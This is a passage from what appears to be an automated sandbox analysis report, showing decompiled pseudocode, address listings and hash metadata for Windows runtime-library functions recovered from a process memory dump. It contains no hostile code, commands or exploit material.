                                                                            				signed int _t122;
                                                                            				signed int _t123;
                                                                            				void* _t129;
                                                                            				signed int _t130;
                                                                            				void* _t132;
                                                                            				intOrPtr* _t134;
                                                                            				signed int _t138;
                                                                            				signed int _t141;
                                                                            				signed int _t147;
                                                                            				intOrPtr _t153;
                                                                            				signed int _t154;
                                                                            				signed int _t155;
                                                                            				signed int _t170;
                                                                            				void* _t174;
                                                                            				signed int _t176;
                                                                            				signed int _t177;
                                                                            
                                                                            				_t129 = __ebx;
                                                                            				_push(_t132);
                                                                            				_push(__esi);
                                                                            				_t174 = _t132;
                                                                            				_t73 =  !( *( *(_t174 + 0x18)));
                                                                            				if(_t73 >= 0) {
                                                                            					L5:
                                                                            					return _t73;
                                                                            				} else {
                                                                            					E0108EEF0(0x1167b60);
                                                                            					_t134 =  *0x1167b84; // 0x77f07b80
                                                                            					_t2 = _t174 + 0x24; // 0x24
                                                                            					_t75 = _t2;
                                                                            					if( *_t134 != 0x1167b80) {
                                                                            						_push(3);
                                                                            						asm("int 0x29");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						asm("int3");
                                                                            						_push(0x1167b60);
                                                                            						_t170 = _v8;
                                                                            						_v28 = 0;
                                                                            						_v40 = 0;
                                                                            						_v24 = 0;
                                                                            						_v17 = 0;
                                                                            						_v32 = 0;
                                                                            						__eflags = _t170 & 0xffff7cf2;
                                                                            						if((_t170 & 0xffff7cf2) != 0) {
                                                                            							L43:
                                                                            							_t77 = 0xc000000d;
                                                                            						} else {
                                                                            							_t79 = _t170 & 0x0000000c;
                                                                            							__eflags = _t79;
                                                                            							if(_t79 != 0) {
                                                                            								__eflags = _t79 - 0xc;
                                                                            								if(_t79 == 0xc) {
                                                                            									goto L43;
                                                                            								} else {
                                                                            									goto L9;
                                                                            								}
                                                                            							} else {
                                                                            								_t170 = _t170 | 0x00000008;
                                                                            								__eflags = _t170;
                                                                            								L9:
                                                                            								_t81 = _t170 & 0x00000300;
                                                                            								__eflags = _t81 - 0x300;
                                                                            								if(_t81 == 0x300) {
                                                                            									goto L43;
                                                                            								} else {
                                                                            									_t138 = _t170 & 0x00000001;
                                                                            									__eflags = _t138;
                                                                            									_v24 = _t138;
                                                                            									if(_t138 != 0) {
                                                                            										__eflags = _t81;
                                                                            										if(_t81 != 0) {
                                                                            											goto L43;
                                                                            										} else {
                                                                            											goto L11;
                                                                            										}
                                                                            									} else {
                                                                            										L11:
                                                                            										_push(_t129);
                                                                            										_t77 = E01086D90( &_v20);
                                                                            										_t130 = _t77;
                                                                            										__eflags = _t130;
                                                                            										if(_t130 >= 0) {
                                                                            											_push(_t174);
                                                                            											__eflags = _t170 & 0x00000301;
                                                                            											if((_t170 & 0x00000301) == 0) {
                                                                            												_t176 = _a8;
                                                                            												__eflags = _t176;
                                                                            												if(__eflags == 0) {
                                                                            													L64:
                                                                            													_t83 =  *[fs:0x18];
                                                                            													_t177 = 0;
                                                                            													__eflags =  *(_t83 + 0xfb8);
                                                                            													if( *(_t83 + 0xfb8) != 0) {
                                                                            														E010876E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                            														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                            													}
                                                                            													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                            													goto L15;
                                                                            												} else {
                                                                            													asm("sbb edx, edx");
                                                                            													_t114 = E01118938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                            													__eflags = _t114;
                                                                            													if(_t114 < 0) {
                                                                            														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                            														E0107B150();
                                                                            													}
                                                                            													_t116 = E01116D81(_t176,  &_v16);
                                                                            													__eflags = _t116;
                                                                            													if(_t116 >= 0) {
                                                                            														__eflags = _v16 - 2;
                                                                            														if(_v16 < 2) {
                                                                            															L56:
                                                                            															_t118 = E010875CE(_v20, 5, 0);
                                                                            															__eflags = _t118;
                                                                            															if(_t118 < 0) {
                                                                            																L67:
                                                                            																_t130 = 0xc0000017;
                                                                            																goto L32;
                                                                            															} else {
                                                                            																__eflags = _v12;
                                                                            																if(_v12 == 0) {
                                                                            																	goto L67;
                                                                            																} else {
                                                                            																	_t153 =  *0x1168638; // 0x0
                                                                            																	_t122 = L010838A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                            																	_t154 = _v12;
                                                                            																	_t130 = _t122;
                                                                            																	__eflags = _t130;
                                                                            																	if(_t130 >= 0) {
                                                                            																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                            																		__eflags = _t123;
                                                                            																		if(_t123 != 0) {
                                                                            																			_t155 = _a12;
                                                                            																			__eflags = _t155;
                                                                            																			if(_t155 != 0) {
                                                                            																				 *_t155 = _t123;
                                                                            																			}
                                                                            																			goto L64;
                                                                            																		} else {
                                                                            																			E010876E2(_t154);
                                                                            																			goto L41;
                                                                            																		}
                                                                            																	} else {
                                                                            																		E010876E2(_t154);
                                                                            																		_t177 = 0;
                                                                            																		goto L18;
                                                                            																	}
                                                                            																}
                                                                            															}
                                                                            														} else {
                                                                            															__eflags =  *_t176;
                                                                            															if( *_t176 != 0) {
                                                                            																goto L56;
                                                                            															} else {
                                                                            																__eflags =  *(_t176 + 2);
                                                                            																if( *(_t176 + 2) == 0) {
                                                                            																	goto L64;
                                                                            																} else {
                                                                            																	goto L56;
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            													} else {
                                                                            														_t130 = 0xc000000d;
                                                                            														goto L32;
                                                                            													}
                                                                            												}
                                                                            												goto L35;
                                                                            											} else {
                                                                            												__eflags = _a8;
                                                                            												if(_a8 != 0) {
                                                                            													_t77 = 0xc000000d;
                                                                            												} else {
                                                                            													_v5 = 1;
                                                                            													L010AFCE3(_v20, _t170);
                                                                            													_t177 = 0;
                                                                            													__eflags = 0;
                                                                            													L15:
                                                                            													_t85 =  *[fs:0x18];
                                                                            													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                            													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                            														L18:
                                                                            														__eflags = _t130;
                                                                            														if(_t130 != 0) {
                                                                            															goto L32;
                                                                            														} else {
                                                                            															__eflags = _v5 - _t130;
                                                                            															if(_v5 == _t130) {
                                                                            																goto L32;
                                                                            															} else {
                                                                            																_t86 =  *[fs:0x18];
                                                                            																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                            																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                            																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                            																}
                                                                            																__eflags = _t177;
                                                                            																if(_t177 == 0) {
                                                                            																	L31:
                                                                            																	__eflags = 0;
                                                                            																	L010870F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                            																	goto L32;
                                                                            																} else {
                                                                            																	__eflags = _v24;
                                                                            																	_t91 =  *(_t177 + 0x20);
                                                                            																	if(_v24 != 0) {
                                                                            																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                            																		goto L31;
                                                                            																	} else {
                                                                            																		_t141 = _t91 & 0x00000040;
                                                                            																		__eflags = _t170 & 0x00000100;
                                                                            																		if((_t170 & 0x00000100) == 0) {
                                                                            																			__eflags = _t141;
                                                                            																			if(_t141 == 0) {
                                                                            																				L74:
                                                                            																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                            																				goto L27;
                                                                            																			} else {
                                                                            																				_t177 = E010AFD22(_t177);
                                                                            																				__eflags = _t177;
                                                                            																				if(_t177 == 0) {
                                                                            																					goto L42;
                                                                            																				} else {
                                                                            																					_t130 = E010AFD9B(_t177, 0, 4);
                                                                            																					__eflags = _t130;
                                                                            																					if(_t130 != 0) {
                                                                            																						goto L42;
                                                                            																					} else {
                                                                            																						_t68 = _t177 + 0x20;
                                                                            																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                            																						__eflags =  *_t68;
                                                                            																						_t91 =  *(_t177 + 0x20);
                                                                            																						goto L74;
                                                                            																					}
                                                                            																				}
                                                                            																			}
                                                                            																			goto L35;
                                                                            																		} else {
                                                                            																			__eflags = _t141;
                                                                            																			if(_t141 != 0) {
                                                                            																				_t177 = E010AFD22(_t177);
                                                                            																				__eflags = _t177;
                                                                            																				if(_t177 == 0) {
                                                                            																					L42:
                                                                            																					_t77 = 0xc0000001;
                                                                            																					goto L33;
                                                                            																				} else {
                                                                            																					_t130 = E010AFD9B(_t177, 0, 4);
                                                                            																					__eflags = _t130;
                                                                            																					if(_t130 != 0) {
                                                                            																						goto L42;
                                                                            																					} else {
                                                                            																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                            																						_t91 =  *(_t177 + 0x20);
                                                                            																						goto L26;
                                                                            																					}
                                                                            																				}
                                                                            																				goto L35;
                                                                            																			} else {
                                                                            																				L26:
                                                                            																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                            																				__eflags = _t94;
                                                                            																				L27:
                                                                            																				 *(_t177 + 0x20) = _t94;
                                                                            																				__eflags = _t170 & 0x00008000;
                                                                            																				if((_t170 & 0x00008000) != 0) {
                                                                            																					_t95 = _a12;
                                                                            																					__eflags = _t95;
                                                                            																					if(_t95 != 0) {
                                                                            																						_t96 =  *_t95;
                                                                            																						__eflags = _t96;
                                                                            																						if(_t96 != 0) {
                                                                            																							 *((short*)(_t177 + 0x22)) = 0;
                                                                            																							_t40 = _t177 + 0x20;
                                                                            																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                            																							__eflags =  *_t40;
                                                                            																						}
                                                                            																					}
                                                                            																				}
                                                                            																				goto L31;
                                                                            																			}
                                                                            																		}
                                                                            																	}
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            													} else {
                                                                            														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                            														_t106 =  *(_t147 + 0x20);
                                                                            														__eflags = _t106 & 0x00000040;
                                                                            														if((_t106 & 0x00000040) != 0) {
                                                                            															_t147 = E010AFD22(_t147);
                                                                            															__eflags = _t147;
                                                                            															if(_t147 == 0) {
                                                                            																L41:
                                                                            																_t130 = 0xc0000001;
                                                                            																L32:
                                                                            																_t77 = _t130;
                                                                            																goto L33;
                                                                            															} else {
                                                                            																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                            																_t106 =  *(_t147 + 0x20);
                                                                            																goto L17;
                                                                            															}
                                                                            															goto L35;
                                                                            														} else {
                                                                            															L17:
                                                                            															_t108 = _t106 | 0x00000080;
                                                                            															__eflags = _t108;
                                                                            															 *(_t147 + 0x20) = _t108;
                                                                            															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                            															goto L18;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            											L33:
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						L35:
                                                                            						return _t77;
                                                                            					} else {
                                                                            						 *_t75 = 0x1167b80;
                                                                            						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                            						 *_t134 = _t75;
                                                                            						 *0x1167b84 = _t75;
                                                                            						_t73 = E0108EB70(_t134, 0x1167b60);
                                                                            						if( *0x1167b20 != 0) {
                                                                            							_t73 =  *( *[fs:0x30] + 0xc);
                                                                            							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                            								_t73 = E0108FF60( *0x1167b20);
                                                                            							}
                                                                            						}
                                                                            						goto L5;
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            Strings
                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 010EBE0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                            • API String ID: 0-865735534
                                                                            • Opcode ID: 8ba804fef35678e2056d484464106862e7ab4b461fb84f3bb881a94dbd22a375
                                                                            • Instruction ID: 6c64d08187a3f5ddc4b27fd320720a2ed34af9e80538038e5f364f2b02c54613
                                                                            • Opcode Fuzzy Hash: 8ba804fef35678e2056d484464106862e7ab4b461fb84f3bb881a94dbd22a375
                                                                            • Instruction Fuzzy Hash: C2A10331B0060B8FEB66EBAAC4547BEB7E5AF48710F0445B9D9C6CB681DB30D8418B80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 63%
                                                                            			E01072D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                            				signed char _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				intOrPtr _v28;
                                                                            				intOrPtr _v32;
                                                                            				signed int _v52;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				intOrPtr _t55;
                                                                            				signed int _t57;
                                                                            				signed int _t58;
                                                                            				char* _t62;
                                                                            				signed char* _t63;
                                                                            				signed char* _t64;
                                                                            				signed int _t67;
                                                                            				signed int _t72;
                                                                            				signed int _t77;
                                                                            				signed int _t78;
                                                                            				signed int _t88;
                                                                            				intOrPtr _t89;
                                                                            				signed char _t93;
                                                                            				signed int _t97;
                                                                            				signed int _t98;
                                                                            				signed int _t102;
                                                                            				signed int _t103;
                                                                            				intOrPtr _t104;
                                                                            				signed int _t105;
                                                                            				signed int _t106;
                                                                            				signed char _t109;
                                                                            				signed int _t111;
                                                                            				void* _t116;
                                                                            
                                                                            				_t102 = __edi;
                                                                            				_t97 = __edx;
                                                                            				_v12 = _v12 & 0x00000000;
                                                                            				_t55 =  *[fs:0x18];
                                                                            				_t109 = __ecx;
                                                                            				_v8 = __edx;
                                                                            				_t86 = 0;
                                                                            				_v32 = _t55;
                                                                            				_v24 = 0;
                                                                            				_push(__edi);
                                                                            				if(__ecx == 0x1165350) {
                                                                            					_t86 = 1;
                                                                            					_v24 = 1;
                                                                            					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                            				}
                                                                            				_t103 = _t102 | 0xffffffff;
                                                                            				if( *0x1167bc8 != 0) {
                                                                            					_push(0xc000004b);
                                                                            					_push(_t103);
                                                                            					E010B97C0();
                                                                            				}
                                                                            				if( *0x11679c4 != 0) {
                                                                            					_t57 = 0;
                                                                            				} else {
                                                                            					_t57 = 0x11679c8;
                                                                            				}
                                                                            				_v16 = _t57;
                                                                            				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                            					_t93 = _t109;
                                                                            					L23();
                                                                            				}
                                                                            				_t58 =  *_t109;
                                                                            				if(_t58 == _t103) {
                                                                            					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                            					_t58 = _t103;
                                                                            					if(__eflags == 0) {
                                                                            						_t93 = _t109;
                                                                            						E010A1624(_t86, __eflags);
                                                                            						_t58 =  *_t109;
                                                                            					}
                                                                            				}
                                                                            				_v20 = _v20 & 0x00000000;
                                                                            				if(_t58 != _t103) {
                                                                            					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                            				}
                                                                            				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                            				_t88 = _v16;
                                                                            				_v28 = _t104;
                                                                            				L9:
                                                                            				while(1) {
                                                                            					if(E01097D50() != 0) {
                                                                            						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                            					} else {
                                                                            						_t62 = 0x7ffe0382;
                                                                            					}
                                                                            					if( *_t62 != 0) {
                                                                            						_t63 =  *[fs:0x30];
                                                                            						__eflags = _t63[0x240] & 0x00000002;
                                                                            						if((_t63[0x240] & 0x00000002) != 0) {
                                                                            							_t93 = _t109;
                                                                            							E0110FE87(_t93);
                                                                            						}
                                                                            					}
                                                                            					if(_t104 != 0xffffffff) {
                                                                            						_push(_t88);
                                                                            						_push(0);
                                                                            						_push(_t104);
                                                                            						_t64 = E010B9520();
                                                                            						goto L15;
                                                                            					} else {
                                                                            						while(1) {
                                                                            							_t97 =  &_v8;
                                                                            							_t64 = E010AE18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                            							if(_t64 == 0x102) {
                                                                            								break;
                                                                            							}
                                                                            							_t93 =  *(_t109 + 4);
                                                                            							_v8 = _t93;
                                                                            							if((_t93 & 0x00000002) != 0) {
                                                                            								continue;
                                                                            							}
                                                                            							L15:
                                                                            							if(_t64 == 0x102) {
                                                                            								break;
                                                                            							}
                                                                            							_t89 = _v24;
                                                                            							if(_t64 < 0) {
                                                                            								L010CDF30(_t93, _t97, _t64);
                                                                            								_push(_t93);
                                                                            								_t98 = _t97 | 0xffffffff;
                                                                            								__eflags =  *0x1166901;
                                                                            								_push(_t109);
                                                                            								_v52 = _t98;
                                                                            								if( *0x1166901 != 0) {
                                                                            									_push(0);
                                                                            									_push(1);
                                                                            									_push(0);
                                                                            									_push(0x100003);
                                                                            									_push( &_v12);
                                                                            									_t72 = E010B9980();
                                                                            									__eflags = _t72;
                                                                            									if(_t72 < 0) {
                                                                            										_v12 = _t98 | 0xffffffff;
                                                                            									}
                                                                            								}
                                                                            								asm("lock cmpxchg [ecx], edx");
                                                                            								_t111 = 0;
                                                                            								__eflags = 0;
                                                                            								if(0 != 0) {
                                                                            									__eflags = _v12 - 0xffffffff;
                                                                            									if(_v12 != 0xffffffff) {
                                                                            										_push(_v12);
                                                                            										E010B95D0();
                                                                            									}
                                                                            								} else {
                                                                            									_t111 = _v12;
                                                                            								}
                                                                            								return _t111;
                                                                            							} else {
                                                                            								if(_t89 != 0) {
                                                                            									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                            									_t77 = E01097D50();
                                                                            									__eflags = _t77;
                                                                            									if(_t77 == 0) {
                                                                            										_t64 = 0x7ffe0384;
                                                                            									} else {
                                                                            										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                            									}
                                                                            									__eflags =  *_t64;
                                                                            									if( *_t64 != 0) {
                                                                            										_t64 =  *[fs:0x30];
                                                                            										__eflags = _t64[0x240] & 0x00000004;
                                                                            										if((_t64[0x240] & 0x00000004) != 0) {
                                                                            											_t78 = E01097D50();
                                                                            											__eflags = _t78;
                                                                            											if(_t78 == 0) {
                                                                            												_t64 = 0x7ffe0385;
                                                                            											} else {
                                                                            												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                            											}
                                                                            											__eflags =  *_t64 & 0x00000020;
                                                                            											if(( *_t64 & 0x00000020) != 0) {
                                                                            												_t64 = E010F7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								return _t64;
                                                                            							}
                                                                            						}
                                                                            						_t97 = _t88;
                                                                            						_t93 = _t109;
                                                                            						E0110FDDA(_t97, _v12);
                                                                            						_t105 =  *_t109;
                                                                            						_t67 = _v12 + 1;
                                                                            						_v12 = _t67;
                                                                            						__eflags = _t105 - 0xffffffff;
                                                                            						if(_t105 == 0xffffffff) {
                                                                            							_t106 = 0;
                                                                            							__eflags = 0;
                                                                            						} else {
                                                                            							_t106 =  *(_t105 + 0x14);
                                                                            						}
                                                                            						__eflags = _t67 - 2;
                                                                            						if(_t67 > 2) {
                                                                            							__eflags = _t109 - 0x1165350;
                                                                            							if(_t109 != 0x1165350) {
                                                                            								__eflags = _t106 - _v20;
                                                                            								if(__eflags == 0) {
                                                                            									_t93 = _t109;
                                                                            									E0110FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						_push("RTL: Re-Waiting\n");
                                                                            						_push(0);
                                                                            						_push(0x65);
                                                                            						_v20 = _t106;
                                                                            						E01105720();
                                                                            						_t104 = _v28;
                                                                            						_t116 = _t116 + 0xc;
                                                                            						continue;
                                                                            					}
                                                                            				}
                                                                            			}




































                                                                            0x010cfaf7
                                                                            0x010cfaf8
                                                                            0x010cfafd
                                                                            0x010cfaff
                                                                            0x010cfb04
                                                                            0x010cfb04
                                                                            0x010cfaff
                                                                            0x01072ec0
                                                                            0x01072ec4
                                                                            0x01072ec6
                                                                            0x01072ec8
                                                                            0x010cfb14
                                                                            0x010cfb18
                                                                            0x010cfb1e
                                                                            0x010cfb21
                                                                            0x010cfb21
                                                                            0x01072ece
                                                                            0x01072ece
                                                                            0x01072ece
                                                                            0x01072ed7
                                                                            0x01072e61
                                                                            0x01072e63
                                                                            0x010cfa6b
                                                                            0x010cfa71
                                                                            0x010cfa76
                                                                            0x010cfa78
                                                                            0x010cfa8a
                                                                            0x010cfa7a
                                                                            0x010cfa83
                                                                            0x010cfa83
                                                                            0x010cfa8f
                                                                            0x010cfa91
                                                                            0x010cfa97
                                                                            0x010cfa9d
                                                                            0x010cfaa4
                                                                            0x010cfaaa
                                                                            0x010cfaaf
                                                                            0x010cfab1
                                                                            0x010cfac3
                                                                            0x010cfab3
                                                                            0x010cfabc
                                                                            0x010cfabc
                                                                            0x010cfac8
                                                                            0x010cfacb
                                                                            0x010cfadf
                                                                            0x010cfadf
                                                                            0x010cfacb
                                                                            0x010cfaa4
                                                                            0x010cfa91
                                                                            0x01072e6f
                                                                            0x01072e6f
                                                                            0x01072e5f
                                                                            0x010cfa13
                                                                            0x010cfa15
                                                                            0x010cfa17
                                                                            0x010cfa1f
                                                                            0x010cfa21
                                                                            0x010cfa22
                                                                            0x010cfa25
                                                                            0x010cfa28
                                                                            0x010cfa2f
                                                                            0x010cfa2f
                                                                            0x010cfa2a
                                                                            0x010cfa2a
                                                                            0x010cfa2a
                                                                            0x010cfa31
                                                                            0x010cfa34
                                                                            0x010cfa36
                                                                            0x010cfa3c
                                                                            0x010cfa3e
                                                                            0x010cfa41
                                                                            0x010cfa43
                                                                            0x010cfa45
                                                                            0x010cfa45
                                                                            0x010cfa41
                                                                            0x010cfa3c
                                                                            0x010cfa4a
                                                                            0x010cfa4f
                                                                            0x010cfa51
                                                                            0x010cfa53
                                                                            0x010cfa56
                                                                            0x010cfa5b
                                                                            0x010cfa5e
                                                                            0x00000000
                                                                            0x010cfa5e
                                                                            0x01072e23

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Re-Waiting
                                                                            • API String ID: 0-316354757
                                                                            • Opcode ID: 8fe09e023432b08613446f909441b17cc5b7b4dd9917491cde5a0876bfce641c
                                                                            • Instruction ID: 3abf55cf0de669b0858d24fd0b196b87f3c1370d12d415f7b6f597de12592fc6
                                                                            • Opcode Fuzzy Hash: 8fe09e023432b08613446f909441b17cc5b7b4dd9917491cde5a0876bfce641c
                                                                            • Instruction Fuzzy Hash: 6A613671E006069FDB32DB6CC840BBEBBE6EB44B14F1406A9E5D1972C1C7749D41CB96
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
                                                                            			E01140EA5(void* __ecx, void* __edx) {
                                                                            				signed int _v20;
                                                                            				char _v24;
                                                                            				intOrPtr _v28;
                                                                            				unsigned int _v32;
                                                                            				signed int _v36;
                                                                            				intOrPtr _v40;
                                                                            				char _v44;
                                                                            				intOrPtr _v64;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				signed int _t58;
                                                                            				unsigned int _t60;
                                                                            				intOrPtr _t62;
                                                                            				char* _t67;
                                                                            				char* _t69;
                                                                            				void* _t80;
                                                                            				void* _t83;
                                                                            				intOrPtr _t93;
                                                                            				intOrPtr _t115;
                                                                            				char _t117;
                                                                            				void* _t120;
                                                                            
                                                                            				_t83 = __edx;
                                                                            				_t117 = 0;
                                                                            				_t120 = __ecx;
                                                                            				_v44 = 0;
                                                                            				if(E0113FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                            					L24:
                                                                            					_t109 = _v44;
                                                                            					if(_v44 != 0) {
                                                                            						E01141074(_t83, _t120, _t109, _t117, _t117);
                                                                            					}
                                                                            					L26:
                                                                            					return _t117;
                                                                            				}
                                                                            				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                            				_t5 = _t83 + 1; // 0x1
                                                                            				_v36 = _t5 << 0xc;
                                                                            				_v40 = _t93;
                                                                            				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                            				asm("sbb ebx, ebx");
                                                                            				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                            				if(_t58 != 0) {
                                                                            					_push(0);
                                                                            					_push(0x14);
                                                                            					_push( &_v24);
                                                                            					_push(3);
                                                                            					_push(_t93);
                                                                            					_push(0xffffffff);
                                                                            					_t80 = E010B9730();
                                                                            					_t115 = _v64;
                                                                            					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                            						_push(_t93);
                                                                            						E0113A80D(_t115, 1, _v20, _t117);
                                                                            						_t83 = 4;
                                                                            					}
                                                                            				}
                                                                            				if(E0113A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                            					goto L24;
                                                                            				}
                                                                            				_t60 = _v32;
                                                                            				_t97 = (_t60 != 0x100000) + 1;
                                                                            				_t83 = (_v44 -  *0x1168b04 >> 0x14) + (_v44 -  *0x1168b04 >> 0x14);
                                                                            				_v28 = (_t60 != 0x100000) + 1;
                                                                            				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                            				_v40 = _t62;
                                                                            				if(_t83 >= _t62) {
                                                                            					L10:
                                                                            					asm("lock xadd [eax], ecx");
                                                                            					asm("lock xadd [eax], ecx");
                                                                            					if(E01097D50() == 0) {
                                                                            						_t67 = 0x7ffe0380;
                                                                            					} else {
                                                                            						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            					}
                                                                            					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                            						E0113138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                            					}
                                                                            					if(E01097D50() == 0) {
                                                                            						_t69 = 0x7ffe0388;
                                                                            					} else {
                                                                            						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                            					}
                                                                            					if( *_t69 != 0) {
                                                                            						E0112FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                            					}
                                                                            					if(( *0x1168724 & 0x00000008) != 0) {
                                                                            						E011352F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                            					}
                                                                            					_t117 = _v44;
                                                                            					goto L26;
                                                                            				}
                                                                            				while(E011415B5(0x1168ae4, _t83, _t97, _t97) >= 0) {
                                                                            					_t97 = _v28;
                                                                            					_t83 = _t83 + 2;
                                                                            					if(_t83 < _v40) {
                                                                            						continue;
                                                                            					}
                                                                            					goto L10;
                                                                            				}
                                                                            				goto L24;
                                                                            			}

























                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `
                                                                            • API String ID: 0-2679148245
                                                                            • Opcode ID: 8308e9afa9baf1f77a2d0f0b0a03737cb44584b1657799edcf056ee8fcfae7d9
                                                                            • Instruction ID: b4f94a9fc8979b7175b01ab7cf3d57d5832301c663e2355c3e300d45ccc70325
                                                                            • Opcode Fuzzy Hash: 8308e9afa9baf1f77a2d0f0b0a03737cb44584b1657799edcf056ee8fcfae7d9
                                                                            • Instruction Fuzzy Hash: 3A518E713043429FD329DF29D884B5BBBE5EBC8A14F04092CFA9697290D771E845CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                            			E010AF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                            				intOrPtr _v8;
                                                                            				intOrPtr _v12;
                                                                            				intOrPtr _v16;
                                                                            				char* _v20;
                                                                            				intOrPtr _v24;
                                                                            				char _v28;
                                                                            				intOrPtr _v32;
                                                                            				char _v36;
                                                                            				char _v44;
                                                                            				char _v52;
                                                                            				intOrPtr _v56;
                                                                            				char _v60;
                                                                            				intOrPtr _v72;
                                                                            				void* _t51;
                                                                            				void* _t58;
                                                                            				signed short _t82;
                                                                            				short _t84;
                                                                            				signed int _t91;
                                                                            				signed int _t100;
                                                                            				signed short* _t103;
                                                                            				void* _t108;
                                                                            				intOrPtr* _t109;
                                                                            
                                                                            				_t103 = __ecx;
                                                                            				_t82 = __edx;
                                                                            				_t51 = E01094120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                            				if(_t51 >= 0) {
                                                                            					_push(0x21);
                                                                            					_push(3);
                                                                            					_v56 =  *0x7ffe02dc;
                                                                            					_v20 =  &_v52;
